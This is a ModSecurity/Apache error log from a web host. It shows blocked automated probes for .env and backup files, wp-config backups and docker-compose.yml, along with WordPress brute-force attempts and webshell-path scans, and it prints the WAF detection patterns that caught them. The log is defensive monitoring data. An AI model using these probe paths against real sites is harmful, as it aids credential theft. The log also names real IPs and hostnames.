[Tue May 26 18:45:26.351475 2026] [security2:error] [pid 1025417:tid 1025656] [client 208.84.100.55:45962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.bak"] [unique_id "ahWc7lHbArxonFeMXvQV_wAAAG0"]
[Tue May 26 18:45:26.351751 2026] [proxy:error] [pid 1025417:tid 1025570] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:26.351809 2026] [proxy_http:error] [pid 1025417:tid 1025570] [client 208.84.100.55:45906] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:26.352375 2026] [proxy:error] [pid 1025417:tid 1025570] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:26.352407 2026] [proxy_http:error] [pid 1025417:tid 1025570] [client 208.84.100.55:45906] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:26.428942 2026] [security2:error] [pid 1025417:tid 1025661] [client 208.84.100.55:45886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.old"] [unique_id "ahWc7lHbArxonFeMXvQWAQAAAHI"]
[Tue May 26 18:45:26.429115 2026] [security2:error] [pid 1025417:tid 1025622] [client 208.84.100.55:45892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.backup"] [unique_id "ahWc7lHbArxonFeMXvQWAgAAAEs"]
[Tue May 26 18:45:26.429860 2026] [security2:error] [pid 1025417:tid 1025629] [client 208.84.100.55:45880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.local.bak"] [unique_id "ahWc7lHbArxonFeMXvQWBAAAAFI"]
[Tue May 26 18:45:26.430216 2026] [proxy:error] [pid 1025417:tid 1025642] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:26.430273 2026] [proxy_http:error] [pid 1025417:tid 1025642] [client 208.84.100.55:56010] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:26.430918 2026] [proxy:error] [pid 1025417:tid 1025642] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:26.430954 2026] [proxy_http:error] [pid 1025417:tid 1025642] [client 208.84.100.55:56010] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:26.445027 2026] [security2:error] [pid 1025417:tid 1025588] [client 208.84.100.55:45826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.backup"] [unique_id "ahWc7lHbArxonFeMXvQWBQAAACk"]
[Tue May 26 18:45:26.448801 2026] [security2:error] [pid 1025417:tid 1025655] [client 208.84.100.55:45812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.bak"] [unique_id "ahWc7lHbArxonFeMXvQWBgAAAGw"]
[Tue May 26 18:45:26.526752 2026] [security2:error] [pid 1025417:tid 1025670] [client 208.84.100.55:45822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env.old"] [unique_id "ahWc7lHbArxonFeMXvQWBwAAAHs"]
[Tue May 26 18:45:26.530890 2026] [proxy:error] [pid 1025417:tid 1025668] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:26.530969 2026] [proxy_http:error] [pid 1025417:tid 1025668] [client 208.84.100.55:45800] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:26.531833 2026] [proxy:error] [pid 1025417:tid 1025668] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:26.531878 2026] [proxy_http:error] [pid 1025417:tid 1025668] [client 208.84.100.55:45800] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:26.535757 2026] [proxy:error] [pid 1025417:tid 1025555] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:26.535844 2026] [proxy_http:error] [pid 1025417:tid 1025555] [client 208.84.100.55:45790] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:26.536432 2026] [proxy:error] [pid 1025417:tid 1025555] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:26.536468 2026] [proxy_http:error] [pid 1025417:tid 1025555] [client 208.84.100.55:45790] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:27.521436 2026] [security2:error] [pid 1025417:tid 1025529] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/public/.env"] [unique_id "ahWc71HbArxonFeMXvQWHwAATm8"]
[Tue May 26 18:45:28.588080 2026] [security2:error] [pid 1025417:tid 1025628] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc8FHbArxonFeMXvQWMgAAAFE"]
[Tue May 26 18:45:29.183615 2026] [security2:error] [pid 1025417:tid 1025606] [client 202.76.190.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc8FHbArxonFeMXvQWRgAAADs"]
[Tue May 26 18:45:29.447031 2026] [security2:error] [pid 1025417:tid 1025423] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/portal/.env"] [unique_id "ahWc8VHbArxonFeMXvQWXgAASAU"]
[Tue May 26 18:45:29.831569 2026] [proxy:error] [pid 1025417:tid 1025565] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:29.831647 2026] [proxy_http:error] [pid 1025417:tid 1025565] [client 208.84.100.55:45868] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:29.832229 2026] [proxy:error] [pid 1025417:tid 1025565] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:29.832279 2026] [proxy_http:error] [pid 1025417:tid 1025565] [client 208.84.100.55:45868] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:30.915553 2026] [security2:error] [pid 1025417:tid 1025660] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc8lHbArxonFeMXvQWgQAAAHE"]
[Tue May 26 18:45:31.868405 2026] [security2:error] [pid 1025417:tid 1025434] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/application/.env"] [unique_id "ahWc81HbArxonFeMXvQWrwAALxA"]
[Tue May 26 18:45:32.093561 2026] [security2:error] [pid 1025417:tid 1025430] [remote 163.61.60.30:34816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWc81HbArxonFeMXvQWtQAAEww"]
[Tue May 26 18:45:32.744957 2026] [security2:error] [pid 1025417:tid 1025435] [remote 163.61.60.30:34816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWc9FHbArxonFeMXvQWyQAAEBE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:45:33.689298 2026] [security2:error] [pid 1025417:tid 1025550] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc9VHbArxonFeMXvQW2AAAAAM"]
[Tue May 26 18:45:33.743484 2026] [security2:error] [pid 1025417:tid 1025438] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/laravel/.env"] [unique_id "ahWc9VHbArxonFeMXvQW5QAAXBQ"]
[Tue May 26 18:45:35.113541 2026] [security2:error] [pid 1025417:tid 1025439] [remote 203.172.89.21:57698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.89.172.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWc9lHbArxonFeMXvQW-AAAIhU"]
[Tue May 26 18:45:35.676316 2026] [security2:error] [pid 1025417:tid 1025444] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/laravel/.env"] [unique_id "ahWc91HbArxonFeMXvQXEgAADBo"]
[Tue May 26 18:45:36.113150 2026] [security2:error] [pid 1025417:tid 1025574] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc91HbArxonFeMXvQXGAAAABs"]
[Tue May 26 18:45:36.445735 2026] [security2:error] [pid 1025417:tid 1025555] [client 199.45.155.74:45592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "tea.canopykaapi.com"] [uri "/index.php"] [unique_id "ahWc-FHbArxonFeMXvQXJwAAAAg"]
[Tue May 26 18:45:36.863124 2026] [security2:error] [pid 1025417:tid 1025455] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWc-FHbArxonFeMXvQXLQAARSU"]
[Tue May 26 18:45:36.863365 2026] [security2:error] [pid 1025417:tid 1025616] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWc-FHbArxonFeMXvQXLQAARSU"]
[Tue May 26 18:45:37.587680 2026] [security2:error] [pid 1025417:tid 1025449] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/laravel/.env"] [unique_id "ahWc-VHbArxonFeMXvQXQAAAHB8"]
[Tue May 26 18:45:38.191428 2026] [security2:error] [pid 1025417:tid 1025454] [remote 18.219.113.49:37698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWc-VHbArxonFeMXvQXTQAAKyQ"]
[Tue May 26 18:45:38.604210 2026] [security2:error] [pid 1025417:tid 1025585] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc-lHbArxonFeMXvQXVAAAACY"]
[Tue May 26 18:45:39.994040 2026] [security2:error] [pid 1025417:tid 1025465] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/laravel/.env"] [unique_id "ahWc-1HbArxonFeMXvQXggAAEi8"]
[Tue May 26 18:45:40.555056 2026] [security2:error] [pid 1025417:tid 1025567] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc_FHbArxonFeMXvQXhQAAABQ"]
[Tue May 26 18:45:41.947910 2026] [security2:error] [pid 1025417:tid 1025495] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/backend/.env"] [unique_id "ahWc_VHbArxonFeMXvQXsQAARk0"]
[Tue May 26 18:45:43.799816 2026] [security2:error] [pid 1025417:tid 1025597] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc_1HbArxonFeMXvQXzAAAADI"]
[Tue May 26 18:45:43.814801 2026] [security2:error] [pid 1025417:tid 1025478] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/admin/.env"] [unique_id "ahWc_1HbArxonFeMXvQX1gAAbjw"]
[Tue May 26 18:45:45.756655 2026] [security2:error] [pid 1025417:tid 1025485] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/core/.env"] [unique_id "ahWdAVHbArxonFeMXvQYCwAAGkM"]
[Tue May 26 18:45:46.331000 2026] [security2:error] [pid 1025417:tid 1025669] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdAVHbArxonFeMXvQYEAAAAHo"]
[Tue May 26 18:45:47.531100 2026] [security2:error] [pid 1025417:tid 1025460] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdA1HbArxonFeMXvQYMAAAGCo"]
[Tue May 26 18:45:47.531321 2026] [security2:error] [pid 1025417:tid 1025571] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdA1HbArxonFeMXvQYMAAAGCo"]
[Tue May 26 18:45:47.689915 2026] [security2:error] [pid 1025417:tid 1025487] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/.env"] [unique_id "ahWdA1HbArxonFeMXvQYMQAAC0U"]
[Tue May 26 18:45:48.847078 2026] [security2:error] [pid 1025417:tid 1025550] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdBFHbArxonFeMXvQYSQAAAAM"]
[Tue May 26 18:45:49.529074 2026] [security2:error] [pid 1025417:tid 1025496] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bhavisharchitects.com"] [uri "/wp-config.php.bak"] [unique_id "ahWdBVHbArxonFeMXvQYXAAAL04"]
[Tue May 26 18:45:49.546273 2026] [security2:error] [pid 1025417:tid 1025642] [client 119.249.100.109:39405] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahWdBVHbArxonFeMXvQYUgAAAF8"]
[Tue May 26 18:45:50.353453 2026] [security2:error] [pid 1025417:tid 1025634] [client 176.31.139.27:16480] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWdBlHbArxonFeMXvQYeQAAAFc"]
[Tue May 26 18:45:50.353595 2026] [security2:error] [pid 1025417:tid 1025634] [client 176.31.139.27:16480] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWdBlHbArxonFeMXvQYeQAAAFc"]
[Tue May 26 18:45:51.349173 2026] [security2:error] [pid 1025417:tid 1025504] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/docker-compose.yml"] [unique_id "ahWdB1HbArxonFeMXvQYkwAAVFY"]
[Tue May 26 18:45:51.370367 2026] [security2:error] [pid 1025417:tid 1025673] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdBlHbArxonFeMXvQYjAAAAH4"]
[Tue May 26 18:45:51.371803 2026] [security2:error] [pid 1025417:tid 1025669] [client 107.170.66.128:62471] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWdB1HbArxonFeMXvQYlAAAAHo"]
[Tue May 26 18:45:51.538483 2026] [security2:error] [pid 1025417:tid 1025562] [client 4.204.220.190:33093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWdB1HbArxonFeMXvQYmAAAAA8"]
[Tue May 26 18:45:51.538677 2026] [security2:error] [pid 1025417:tid 1025562] [client 4.204.220.190:33093] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWdB1HbArxonFeMXvQYmAAAAA8"]
[Tue May 26 18:45:51.741008 2026] [security2:error] [pid 1025417:tid 1025662] [client 54.39.6.74:24066] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWdB1HbArxonFeMXvQYnQAAAHM"]
[Tue May 26 18:45:51.741143 2026] [security2:error] [pid 1025417:tid 1025662] [client 54.39.6.74:24066] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWdB1HbArxonFeMXvQYnQAAAHM"]
[Tue May 26 18:45:51.830974 2026] [security2:error] [pid 1025417:tid 1025611] [client 4.204.220.190:32425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/x.php"] [unique_id "ahWdB1HbArxonFeMXvQYngAAAEA"]
[Tue May 26 18:45:51.831074 2026] [security2:error] [pid 1025417:tid 1025611] [client 4.204.220.190:32425] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/x.php"] [unique_id "ahWdB1HbArxonFeMXvQYngAAAEA"]
[Tue May 26 18:45:52.207879 2026] [security2:error] [pid 1025417:tid 1025595] [client 4.204.220.190:34254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/201.php"] [unique_id "ahWdCFHbArxonFeMXvQYrAAAADA"]
[Tue May 26 18:45:52.207981 2026] [security2:error] [pid 1025417:tid 1025595] [client 4.204.220.190:34254] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/201.php"] [unique_id "ahWdCFHbArxonFeMXvQYrAAAADA"]
[Tue May 26 18:45:52.437364 2026] [security2:error] [pid 1025417:tid 1025672] [client 4.204.220.190:32417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/ops.php"] [unique_id "ahWdCFHbArxonFeMXvQYswAAAH0"]
[Tue May 26 18:45:52.437461 2026] [security2:error] [pid 1025417:tid 1025672] [client 4.204.220.190:32417] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/ops.php"] [unique_id "ahWdCFHbArxonFeMXvQYswAAAH0"]
